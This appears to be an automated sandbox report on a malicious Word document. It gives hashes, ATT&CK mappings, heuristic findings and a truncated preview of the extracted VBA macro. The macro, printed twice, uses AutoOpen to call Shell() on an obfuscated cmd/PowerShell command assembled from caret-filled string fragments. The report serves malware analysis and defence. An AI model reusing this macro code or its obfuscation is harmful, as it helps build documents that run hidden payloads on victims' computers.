Office (OLE) malware analysis — malicious · 39f96b7821b40cf8

MALICIOUS

Office (OLE)

79.2 KB Created: 2018-08-31 08:01:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 637b935bfe58689f7f793c8271fa9426 SHA-1: b768cb358f79f9269128eb3d786b9b4d7e7c8269 SHA-256: 39f96b7821b40cf8aaaac8b96a84d60218e381fdb1f20bd8de657d11f75d6ba4

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon document opening. The macro utilizes the Shell() function, indicating an attempt to run an external command or program. While the exact command is obfuscated, the presence of the Shell() call and the macro itself strongly suggests the execution of a secondary payload.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6881 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6881 bytes
SHA-256: `6b8f94fa7397bc3cc7bab361f680bdd8daeb8df6ad7abbe5828820c87b194511`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "JfmlbDuENB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Hour 56023 / mQUbkE Hour rAGSJr / GaFIa Hour hZObCD / oiFPGz * 90950 * vDdSYw Shell KeyString(5 + 3 + 2 + 6 + 51) + AQwdvdwss + bwlawazoAo + WzUcci + jJUCs + WAqmjDhols + SNrBEWEj + sRtsiKzGQidGOq, 93 - 93 Hour 88402 / KEbDYj End Sub Attribute VB_Name = "QEbuVoIviDT" Function WzUcci() On _ Error _ Resume _ Next Hour 71677 / PadMB / 7413 * TjcYU Hour 45478 / YRfzQp / ljOnrY * pVrNw UJSkvRrEfE = "md /V^:" + "^O/" + "C" + Chr(0 + 0 + 5 + 1 + 28) + "^s^e" + "^t ^i^D" + "6" + "=^AAC^A" + "g^" + "A" + "^A^" + "I^AAC" + "A^g^A^A" + "I" Hour 63755 * cOLcoD MSnQzpcaIZW = "A" + "^" + "AC^A^g^" + "A" + "^A^IAA" + "CA^g^A" + "^A^I" + "^AAC^A^" + "gA^AI^A" + "AC^AgAQ" + "^" Hour FpZdzN / Tmptw Hour uGtGh * OPUrj lYslRcdn = "fA" + "0^HA^7" + "BA" + "aA^MG" + "^A0BQY" + "^AM^G" + "A^" + "9B^" + "wO^A^" + "sG^A^h" Hour NnhbH * ljnLXi Hour VknlOB * VvwbA Hour kDvpkm * slAGOu Hour 81577 / hzubQ / wHSrU / KShjCN RNiYhRbV = "^" + "BQZ^A^I" + "^H^A^i" + "^BwOA" + "8^G" + "A^BB^w" + "Q^A^QC" + "A^g^AQ^" + "bAU^GA" Hour 27826 * CcYXcV Hour ZGCNNY * vwjiBF Hour 57822 * FWRkF / 63081 * NTGzkM pOmCjL = "^0B^Q" + "^SA0C" + "^Al^Bwa" + "^A8^" + "G^A^2^" Hour AuKfpi / bSSzi * MYLwLR * DJosK Hour 89031 * ZCjab / BKjwXb * qRniRl HJtGfmSRYTZ = "Bg^" + "b^A" + "^kEA" + "7^AQ" + "^KA8G" + "^A" + "B" Hour mAFBdr / RVzkQ * PjXCi * 22213 Hour 58749 / 71 / qHNrBK / DnZlQi Hour 51156 / JEPcX * ioCDLO / vUJmN jbtBaHuHlP = "BwQA^QC" + "AgA^ALA" + "MG" + "ARBg" + "Z^" + "AQCAoA^" + "QZ" + "^Aw" + "^G^A" + "^" + "p^B" + "gR" Hour HIwzE * pWjvvJ * JGWoGi * nvptB Hour zEHbw / rQzBBc Hour 87663 / NXrNMA * zEcoFi / WOqmBB Hour JPXPz / 49068 Hour GhCKz / BbtrX * CJlvt / uPzPT Hour 79830 / wfwsEb zPwSbpQWI = "^AQ" + "G" + "^" + "Ah" + "^B^" + "w^b" + "^Aw^G^A" + "u^Bw^" + "dA^8GA^" Hour 17606 / loXLT * 5284 * FsHIID Hour rRHRMS / UGZbCP Hour 46324 * KIpKk Hour uUOjbX / jfCiiM vwKzijRPbGa = "E" + "^B^" + "g^L^" + "AQ" + "HAv" + "^BQU" + "A^Q" + "CA^" Hour qIUQms * 99565 Hour 16970 / NnuUG Hour 27010 * bPhjQt * LQuZmI / sRsSD cBzXdiwITC = "7^" + "B^Qe^" + "AI^HA" + "0^B" + "w^eAk" + "C" + "^ATB^w^" + "TA^M" + "^" + "HA" + "kA^A^I^" Hour CvZMMk * pBQwz DJQXHRIfJkJ = "A4GA" + "^pB^" + "A^I" + "^AM^" + "G^" + "ARBg^" + "Z" + "^A^QC" + "AoA" WzUcci = UJSkvRrEfE + MSnQzpcaIZW + lYslRcdn + RNiYhRbV + pOmCjL + HJtGfmSRYTZ + jbtBaHuHlP + zPwSbpQWI + vwKzijRPbGa + cBzXdiwITC + DJQXHRIfJkJ Hour 29288 / sahab End Function Function jJUCs() On _ Error _ Resume _ Next Hour TNoqN / uvIQA * 56055 * 95058 Hour szvcc * 77625 Hour qnMmJ / 8365 Hour 4230 * ZdfTMz Hour 96695 * bsJpIJ NPWlqzwmiH = "^A" + "^" + "a" + "AMG^A" + "^hB^Q" + "^" Hour 68058 * zMwjjp Hour 50986 * OsVWbP / 98136 / 11869 Hour JBOfP / ztiZol / 68348 * lMkoWk OFKjSVBFSR = "ZA^I^H^" + "AvBgZ" + "^A^sDA" + "n^" + "A^Q^ZAg" + "H^A^" + "l^Bg^L^" + "AcCArA^" Hour 31100 / wBZmo * 70762 / rDaZjl Hour 67840 / jwmBBc VcFbNRtHquu = "gSA" + "MF^A" + "p^B^A" + "^JAsCAn" + "^A^A^X" + "AcC^Ar^" + "A" + "^w^Y^A" + "^k" + "^G" + "^" + "A" Hour PfKjAv * 71928 * 72320 / jNUNEt Hour iJVFbD * jAblO / WszCZ * THCio Hour AVSWss / EuzEi * 77388 / FAAUzW LticoWv = "^s^B" + "^gYAU" + "^H^A^w^" + "Bg" + "OAYHA" + "^u" + "B^QZAQ" + "CA9AwbA" + "EE" + "A" + "D^BA^" Hour ULfob / fihLhC Hour ditIQ / tvXldN * CKoXX / AzLNEi JWoGkuwjQt = "J" + "^A^sD^" + "An^A" + "w^" + "M^A" + "gDA^4" + "A^wJA^" + "AC^" + "A^9^" + "A^AIA" + "o^E^" + "ATB^Qa^" + "A" Hour 41086 * THYWj Hour 72203 * OGhbZ Hour 56230 / NXYDi * 9587 * XjYiIR Hour KOidUs * JMiTSV DtDndXKPz = "^QCA^" + "7A^QK^" + "Ac" + "CA^AB^" + "w^J" + "^Ag" + "CA^0B^" + "Qa ... (truncated)

SHA-256: 6b8f94fa7397bc3cc7bab361f680bdd8daeb8df6ad7abbe5828820c87b194511

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "JfmlbDuENB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour 56023 / mQUbkE
   Hour rAGSJr / GaFIa
   Hour hZObCD / oiFPGz * 90950 * vDdSYw
Shell KeyString(5 + 3 + 2 + 6 + 51) + AQwdvdwss + bwlawazoAo + WzUcci + jJUCs + WAqmjDhols + SNrBEWEj + sRtsiKzGQidGOq, 93 - 93
   Hour 88402 / KEbDYj
End Sub



Attribute VB_Name = "QEbuVoIviDT"
Function WzUcci()

On _
Error _
Resume _
Next
Hour 71677 / PadMB / 7413 * TjcYU
   Hour 45478 / YRfzQp / ljOnrY * pVrNw
UJSkvRrEfE = "md /V^:" + "^O/" + "C" + Chr(0 + 0 + 5 + 1 + 28) + "^s^e" + "^t ^i^D" + "6" + "=^AAC^A" + "g^" + "A" + "^A^" + "I^AAC" + "A^g^A^A" + "I"
Hour 63755 * cOLcoD
MSnQzpcaIZW = "A" + "^" + "AC^A^g^" + "A" + "^A^IAA" + "CA^g^A" + "^A^I" + "^AAC^A^" + "gA^AI^A" + "AC^AgAQ" + "^"
Hour FpZdzN / Tmptw
   Hour uGtGh * OPUrj
lYslRcdn = "fA" + "0^HA^7" + "BA" + "aA^MG" + "^A0BQY" + "^AM^G" + "A^" + "9B^" + "wO^A^" + "sG^A^h"
Hour NnhbH * ljnLXi
   Hour VknlOB * VvwbA
   Hour kDvpkm * slAGOu
   Hour 81577 / hzubQ / wHSrU / KShjCN
RNiYhRbV = "^" + "BQZ^A^I" + "^H^A^i" + "^BwOA" + "8^G" + "A^BB^w" + "Q^A^QC" + "A^g^AQ^" + "bAU^GA"
Hour 27826 * CcYXcV
   Hour ZGCNNY * vwjiBF
   Hour 57822 * FWRkF / 63081 * NTGzkM
pOmCjL = "^0B^Q" + "^SA0C" + "^Al^Bwa" + "^A8^" + "G^A^2^"
Hour AuKfpi / bSSzi * MYLwLR * DJosK
   Hour 89031 * ZCjab / BKjwXb * qRniRl
HJtGfmSRYTZ = "Bg^" + "b^A" + "^kEA" + "7^AQ" + "^KA8G" + "^A" + "B"
Hour mAFBdr / RVzkQ * PjXCi * 22213
   Hour 58749 / 71 / qHNrBK / DnZlQi
   Hour 51156 / JEPcX * ioCDLO / vUJmN
jbtBaHuHlP = "BwQA^QC" + "AgA^ALA" + "MG" + "ARBg" + "Z^" + "AQCAoA^" + "QZ" + "^Aw" + "^G^A" + "^" + "p^B" + "gR"
Hour HIwzE * pWjvvJ * JGWoGi * nvptB
   Hour zEHbw / rQzBBc
   Hour 87663 / NXrNMA * zEcoFi / WOqmBB
   Hour JPXPz / 49068
   Hour GhCKz / BbtrX * CJlvt / uPzPT
   Hour 79830 / wfwsEb
zPwSbpQWI = "^AQ" + "G" + "^" + "Ah" + "^B^" + "w^b" + "^Aw^G^A" + "u^Bw^" + "dA^8GA^"
Hour 17606 / loXLT * 5284 * FsHIID
   Hour rRHRMS / UGZbCP
   Hour 46324 * KIpKk
   Hour uUOjbX / jfCiiM
vwKzijRPbGa = "E" + "^B^" + "g^L^" + "AQ" + "HAv" + "^BQU" + "A^Q" + "CA^"
Hour qIUQms * 99565
   Hour 16970 / NnuUG
   Hour 27010 * bPhjQt * LQuZmI / sRsSD
cBzXdiwITC = "7^" + "B^Qe^" + "AI^HA" + "0^B" + "w^eAk" + "C" + "^ATB^w^" + "TA^M" + "^" + "HA" + "kA^A^I^"
Hour CvZMMk * pBQwz
DJQXHRIfJkJ = "A4GA" + "^pB^" + "A^I" + "^AM^" + "G^" + "ARBg^" + "Z" + "^A^QC" + "AoA"
WzUcci = UJSkvRrEfE + MSnQzpcaIZW + lYslRcdn + RNiYhRbV + pOmCjL + HJtGfmSRYTZ + jbtBaHuHlP + zPwSbpQWI + vwKzijRPbGa + cBzXdiwITC + DJQXHRIfJkJ
   Hour 29288 / sahab
End Function
Function jJUCs()

On _
Error _
Resume _
Next
Hour TNoqN / uvIQA * 56055 * 95058
   Hour szvcc * 77625
   Hour qnMmJ / 8365
   Hour 4230 * ZdfTMz
   Hour 96695 * bsJpIJ
NPWlqzwmiH = "^A" + "^" + "a" + "AMG^A" + "^hB^Q" + "^"
Hour 68058 * zMwjjp
   Hour 50986 * OsVWbP / 98136 / 11869
   Hour JBOfP / ztiZol / 68348 * lMkoWk
OFKjSVBFSR = "ZA^I^H^" + "AvBgZ" + "^A^sDA" + "n^" + "A^Q^ZAg" + "H^A^" + "l^Bg^L^" + "AcCArA^"
Hour 31100 / wBZmo * 70762 / rDaZjl
   Hour 67840 / jwmBBc
VcFbNRtHquu = "gSA" + "MF^A" + "p^B^A" + "^JAsCAn" + "^A^A^X" + "AcC^Ar^" + "A" + "^w^Y^A" + "^k" + "^G" + "^" + "A"
Hour PfKjAv * 71928 * 72320 / jNUNEt
   Hour iJVFbD * jAblO / WszCZ * THCio
   Hour AVSWss / EuzEi * 77388 / FAAUzW
LticoWv = "^s^B" + "^gYAU" + "^H^A^w^" + "Bg" + "OAYHA" + "^u" + "B^QZAQ" + "CA9AwbA" + "EE" + "A" + "D^BA^"
Hour ULfob / fihLhC
   Hour ditIQ / tvXldN * CKoXX / AzLNEi
JWoGkuwjQt = "J" + "^A^sD^" + "An^A" + "w^" + "M^A" + "gDA^4" + "A^wJA^" + "AC^" + "A^9^" + "A^AIA" + "o^E^" + "ATB^Qa^" + "A"
Hour 41086 * THYWj
   Hour 72203 * OGhbZ
   Hour 56230 / NXYDi * 9587 * XjYiIR
   Hour KOidUs * JMiTSV
DtDndXKPz = "^QCA^" + "7A^QK^" + "Ac" + "CA^AB^" + "w^J" + "^Ag" + "CA^0B^" + "Qa
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.